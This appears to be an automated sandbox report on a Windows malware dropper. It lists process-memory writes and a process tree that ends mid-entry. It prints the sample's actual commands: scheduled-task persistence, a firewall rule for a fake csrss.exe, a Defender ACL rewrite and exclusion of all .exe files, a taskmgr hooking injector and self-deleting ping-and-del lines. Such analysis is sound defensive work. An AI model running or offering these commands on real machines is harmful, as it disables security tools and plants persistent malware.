PID 2128 wrote to memory of 2016	2128	da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe	89
PID 2128 wrote to memory of 2376	2128	da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe	90
PID 2128 wrote to memory of 2376	2128	da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe	90
PID 2128 wrote to memory of 2376	2128	da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe	90
PID 2128 wrote to memory of 2068	2128	da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe	92
PID 2128 wrote to memory of 2068	2128	da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe	92
PID 2128 wrote to memory of 2068	2128	da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe	92
PID 2128 wrote to memory of 2068	2128	da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe	92
PID 2128 wrote to memory of 2068	2128	da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe	92
PID 2128 wrote to memory of 2068	2128	da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe	92
PID 2128 wrote to memory of 2068	2128	da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe	92
PID 2128 wrote to memory of 2068	2128	da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe	92
PID 2068 wrote to memory of 3376	2068	jsc.exe	94
PID 2068 wrote to memory of 3376	2068	jsc.exe	94
PID 2068 wrote to memory of 3376	2068	jsc.exe	94
PID 2068 wrote to memory of 4948	2068	jsc.exe	95
PID 2068 wrote to memory of 4948	2068	jsc.exe	95
PID 2068 wrote to memory of 4948	2068	jsc.exe	95
PID 4948 wrote to memory of 436	4948	BOValDiVDjiQWzr6UN6p6jA7.exe	96
PID 4948 wrote to memory of 436	4948	BOValDiVDjiQWzr6UN6p6jA7.exe	96
PID 4948 wrote to memory of 436	4948	BOValDiVDjiQWzr6UN6p6jA7.exe	96
PID 2068 wrote to memory of 428	2068	jsc.exe	97
PID 2068 wrote to memory of 428	2068	jsc.exe	97
PID 2068 wrote to memory of 428	2068	jsc.exe	97
PID 2068 wrote to memory of 1124	2068	jsc.exe	196
PID 2068 wrote to memory of 1124	2068	jsc.exe	196
PID 2068 wrote to memory of 1124	2068	jsc.exe	196
PID 2068 wrote to memory of 3308	2068	jsc.exe	99
PID 2068 wrote to memory of 3308	2068	jsc.exe	99
PID 2068 wrote to memory of 3308	2068	jsc.exe	99
PID 436 wrote to memory of 4336	436	BOValDiVDjiQWzr6UN6p6jA7.tmp	100
PID 436 wrote to memory of 4336	436	BOValDiVDjiQWzr6UN6p6jA7.tmp	100
PID 436 wrote to memory of 4336	436	BOValDiVDjiQWzr6UN6p6jA7.tmp	100
PID 2068 wrote to memory of 3664	2068	jsc.exe	225
PID 2068 wrote to memory of 3664	2068	jsc.exe	225
PID 2068 wrote to memory of 3664	2068	jsc.exe	225
PID 436 wrote to memory of 2608	436	BOValDiVDjiQWzr6UN6p6jA7.tmp	102
PID 436 wrote to memory of 2608	436	BOValDiVDjiQWzr6UN6p6jA7.tmp	102
PID 436 wrote to memory of 2608	436	BOValDiVDjiQWzr6UN6p6jA7.tmp	102
PID 2068 wrote to memory of 3636	2068	jsc.exe	104
PID 2068 wrote to memory of 3636	2068	jsc.exe	104
PID 2068 wrote to memory of 3636	2068	jsc.exe	104
PID 3376 wrote to memory of 4724	3376	UNAhnkHQ34vsYuu3ggHNYRmg.exe	105
PID 3376 wrote to memory of 4724	3376	UNAhnkHQ34vsYuu3ggHNYRmg.exe	105
PID 3376 wrote to memory of 4724	3376	UNAhnkHQ34vsYuu3ggHNYRmg.exe	105
PID 3636 wrote to memory of 4020	3636	wiv9T1pqAf4f2oHhfWycBzc5.exe	108
PID 3636 wrote to memory of 4020	3636	wiv9T1pqAf4f2oHhfWycBzc5.exe	108
PID 3636 wrote to memory of 4020	3636	wiv9T1pqAf4f2oHhfWycBzc5.exe	108
PID 3636 wrote to memory of 5028	3636	wiv9T1pqAf4f2oHhfWycBzc5.exe	109
PID 3636 wrote to memory of 5028	3636	wiv9T1pqAf4f2oHhfWycBzc5.exe	109
PID 3636 wrote to memory of 5028	3636	wiv9T1pqAf4f2oHhfWycBzc5.exe	109
PID 5028 wrote to memory of 2848	5028	cmd.exe	112
PID 5028 wrote to memory of 2848	5028	cmd.exe	112
PID 5028 wrote to memory of 2848	5028	cmd.exe	112
PID 2068 wrote to memory of 2604	2068	jsc.exe	113
PID 2068 wrote to memory of 2604	2068	jsc.exe	113
PID 2068 wrote to memory of 2604	2068	jsc.exe	113
PID 3376 wrote to memory of 5084	3376	UNAhnkHQ34vsYuu3ggHNYRmg.exe	114
PID 3376 wrote to memory of 5084	3376	UNAhnkHQ34vsYuu3ggHNYRmg.exe	114
PID 3376 wrote to memory of 5084	3376	UNAhnkHQ34vsYuu3ggHNYRmg.exe	114
PID 4020 wrote to memory of 4120	4020	wfplwfs.exe	188
PID 4020 wrote to memory of 4120	4020	wfplwfs.exe	188

C:\Users\Admin\AppData\Local\Temp\da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe
"C:\Users\Admin\AppData\Local\Temp\da08f38fa649643f410f14811c7e3cec28c7aaf5b98ab06bae942695e15a30c6.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2128
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
  2⤵
  PID:2016
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
  2⤵
  PID:2376
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
  2⤵
  - Drops startup file
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2068
- - C:\Users\Admin\Pictures\UNAhnkHQ34vsYuu3ggHNYRmg.exe
    "C:\Users\Admin\Pictures\UNAhnkHQ34vsYuu3ggHNYRmg.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3376
  - - C:\Users\Admin\AppData\Local\Temp\u2ls.0.exe
      "C:\Users\Admin\AppData\Local\Temp\u2ls.0.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:4724
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\DGDAEHCBGI.exe"
        5⤵
        
        PID:3196
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:4988
      - C:\Users\Admin\AppData\Local\Temp\DGDAEHCBGI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\DGDAEHCBGI.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1540
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C ping 2.2.2.2 -n 1 -w 3000 > Nul & Del C:\Users\Admin\AppData\Local\Temp\DGDAEHCBGI.exe
        7⤵
        
        PID:5472
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 2.2.2.2 -n 1 -w 3000
        8⤵
        Runs ping.exe
        
        PID:5460
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4724 -s 2776
        5⤵
        Program crash
        
        PID:832
  - - C:\Users\Admin\AppData\Local\Temp\u2ls.1.exe
      "C:\Users\Admin\AppData\Local\Temp\u2ls.1.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:5084
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
        5⤵
        
        PID:2960
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        6⤵
        
        PID:4756
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
        6⤵
        Creates scheduled task(s)
        
        PID:5148
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3376 -s 1148
      4⤵
      Program crash
      PID:1164
- - C:\Users\Admin\Pictures\BOValDiVDjiQWzr6UN6p6jA7.exe
    "C:\Users\Admin\Pictures\BOValDiVDjiQWzr6UN6p6jA7.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:4948
  - - C:\Users\Admin\AppData\Local\Temp\is-NDRQ9.tmp\BOValDiVDjiQWzr6UN6p6jA7.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-NDRQ9.tmp\BOValDiVDjiQWzr6UN6p6jA7.tmp" /SL5="$8022E,1634197,54272,C:\Users\Admin\Pictures\BOValDiVDjiQWzr6UN6p6jA7.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:436
    - - C:\Users\Admin\AppData\Local\djEdit\djedit.exe
        
        "C:\Users\Admin\AppData\Local\djEdit\djedit.exe" -i
        5⤵
        Executes dropped EXE
        
        PID:4336
    - - C:\Users\Admin\AppData\Local\djEdit\djedit.exe
        
        "C:\Users\Admin\AppData\Local\djEdit\djedit.exe" -s
        5⤵
        Executes dropped EXE
        
        PID:2608
- - C:\Users\Admin\Pictures\wZuArslZHWkceXKudkk2iDCR.exe
    "C:\Users\Admin\Pictures\wZuArslZHWkceXKudkk2iDCR.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:428
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5180
  - - C:\Users\Admin\Pictures\wZuArslZHWkceXKudkk2iDCR.exe
      "C:\Users\Admin\Pictures\wZuArslZHWkceXKudkk2iDCR.exe"
      4⤵
      Executes dropped EXE
      Checks for VirtualBox DLLs, possible anti-VM trick
      Suspicious behavior: EnumeratesProcesses
      PID:6072
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3964
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3044
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:4864
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:3708
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:836
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5656
- - C:\Users\Admin\Pictures\zFFFw4OHExPBcLGvnue2mRJZ.exe
    "C:\Users\Admin\Pictures\zFFFw4OHExPBcLGvnue2mRJZ.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1124
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1832
  - - C:\Users\Admin\Pictures\zFFFw4OHExPBcLGvnue2mRJZ.exe
      "C:\Users\Admin\Pictures\zFFFw4OHExPBcLGvnue2mRJZ.exe"
      4⤵
      Executes dropped EXE
      PID:6032
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6032 -s 268
        5⤵
        Program crash
        
        PID:5280
- - C:\Users\Admin\Pictures\xCnC3kRGjYzKzgztZzTB60s2.exe
    "C:\Users\Admin\Pictures\xCnC3kRGjYzKzgztZzTB60s2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3308
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2760
  - - C:\Users\Admin\Pictures\xCnC3kRGjYzKzgztZzTB60s2.exe
      "C:\Users\Admin\Pictures\xCnC3kRGjYzKzgztZzTB60s2.exe"
      4⤵
      Executes dropped EXE
      PID:6016
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 264
        5⤵
        Program crash
        
        PID:5324
- - C:\Users\Admin\Pictures\L7msUYWEb0w2cAnBCZdJMuLo.exe
    "C:\Users\Admin\Pictures\L7msUYWEb0w2cAnBCZdJMuLo.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3664
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:216
  - - C:\Users\Admin\Pictures\L7msUYWEb0w2cAnBCZdJMuLo.exe
      "C:\Users\Admin\Pictures\L7msUYWEb0w2cAnBCZdJMuLo.exe"
      4⤵
      Executes dropped EXE
      Checks for VirtualBox DLLs, possible anti-VM trick
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      PID:6040
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5928
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:3860
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:3664
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:5864
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:3264
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        
        PID:5456
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        
        PID:6056
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:5772
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:2848
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:4024
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:4804
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:3372
      - C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        6⤵
        
        PID:5520
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:5872
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:836
      - C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        6⤵
        
        PID:2076
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        7⤵
        
        PID:1288
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        Launches sc.exe
        
        PID:4860
- - C:\Users\Admin\Pictures\wiv9T1pqAf4f2oHhfWycBzc5.exe
    "C:\Users\Admin\Pictures\wiv9T1pqAf4f2oHhfWycBzc5.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3636
  - - C:\Users\Admin\AppData\Local\Temp\wfplwfs.exe
      C:\Users\Admin\AppData\Local\Temp\wfplwfs.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Drops file in Windows directory
      Suspicious use of WriteProcessMemory
      PID:4020
    - - C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\system32\rundll32.exe
        5⤵
        
        PID:4120
    - - C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\system32\rundll32.exe
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5076
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5076 -s 1784
        6⤵
        Program crash
        
        PID:1488
    - - C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\system32\rundll32.exe
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5004
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5004 -s 1780
        6⤵
        Program crash
        
        PID:5868
    - - C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\system32\rundll32.exe
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:2084
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2084 -s 1788
        6⤵
        Program crash
        
        PID:5672
    - - C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\system32\rundll32.exe
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:5220
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5220 -s 1760
        6⤵
        Program crash
        
        PID:5492
    - - C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\system32\rundll32.exe
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4452
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4452 -s 1744
        6⤵
        Program crash
        
        PID:5212
    - - C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\system32\rundll32.exe
        5⤵
        
        PID:3564
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3564 -s 1780
        6⤵
        Program crash
        
        PID:3528
    - - C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\system32\rundll32.exe
        5⤵
        
        PID:3708
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3708 -s 1760
        6⤵
        Program crash
        
        PID:3296
    - - C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\system32\rundll32.exe
        5⤵
        
        PID:5148
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5148 -s 1776
        6⤵
        Program crash
        
        PID:3324
    - - C:\Windows\SysWOW64\rundll32.exe
        
        C:\Windows\system32\rundll32.exe
        5⤵
        
        PID:5900
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 1784
        6⤵
        Program crash
        
        PID:4392
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\Pictures\wiv9T1pqAf4f2oHhfWycBzc5.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5028
    - - C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1 -n 3
        5⤵
        Runs ping.exe
        
        PID:2848
- - C:\Users\Admin\Pictures\P3JBDfWsxH7gfXrVpC5Da95h.exe
    "C:\Users\Admin\Pictures\P3JBDfWsxH7gfXrVpC5Da95h.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:2604
  - - C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
      C:\Users\Admin\AppData\Local\Temp\syncUpd.exe
      4⤵
      Executes dropped EXE
      PID:2368
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2368 -s 1016
        5⤵
        Program crash
        
        PID:4532
  - - C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetWindowsHookEx
      PID:5216
- - C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe
    "C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe" --silent --allusers=0
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Enumerates connected drives
    PID:2472
  - - C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe
      C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.29 --initial-client-data=0x2e8,0x2ec,0x2f0,0x2c4,0x2f4,0x6d8e21f8,0x6d8e2204,0x6d8e2210
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:212
  - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\JVj1qEtdxsUSRfq6lUYWP1us.exe
      "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\JVj1qEtdxsUSRfq6lUYWP1us.exe" --version
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:5256
  - - C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe
      "C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=2472 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240319025827" --session-guid=f8168227-ec23-42ba-bff5-53ea2b045c13 --server-tracking-blob=ZTIxMWE3YjdhYzEwYzZiYWIwMzFlNzE0ZDliNjMwOWE3OTczMTQ4NGYxZWQwMWVjNWE5MTc3NWYyMzZmNzI2Mjp7ImNvdW50cnkiOiJHQiIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcxMDgxNzA2Ny41OTc0IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiI2ZmZjODdmZC1mODczLTQyNzEtYWQ5YS1mMTc1MTM4N2ExYjUifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=AC05000000000000
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Enumerates connected drives
      PID:5440
    - - C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe
        
        C:\Users\Admin\Pictures\JVj1qEtdxsUSRfq6lUYWP1us.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=108.0.5067.29 --initial-client-data=0x2e0,0x2e4,0x2f4,0x2bc,0x2f8,0x6a6721f8,0x6a672204,0x6a672210
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:5544
- - C:\Users\Admin\Pictures\vedpmmRXAXSZuq7UqKOIe4r1.exe
    "C:\Users\Admin\Pictures\vedpmmRXAXSZuq7UqKOIe4r1.exe"
    3⤵
    - Executes dropped EXE
    PID:5336
  - - C:\Users\Admin\AppData\Local\Temp\7zS7FBA.tmp\Install.exe
      .\Install.exe
      4⤵
      Executes dropped EXE
      PID:4484
    - - C:\Users\Admin\AppData\Local\Temp\7zS8855.tmp\Install.exe
        
        .\Install.exe /DDfBFdidvhHni "385118" /S
        5⤵
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Drops file in System32 directory
        Enumerates system info in registry
        
        PID:5408
      - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        6⤵
        
        PID:4988
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
        7⤵
        
        PID:5664
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
        8⤵
        
        PID:2116
        
        \??\c:\windows\SysWOW64\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
        8⤵
        
        PID:2480
      - C:\Windows\SysWOW64\forfiles.exe
        
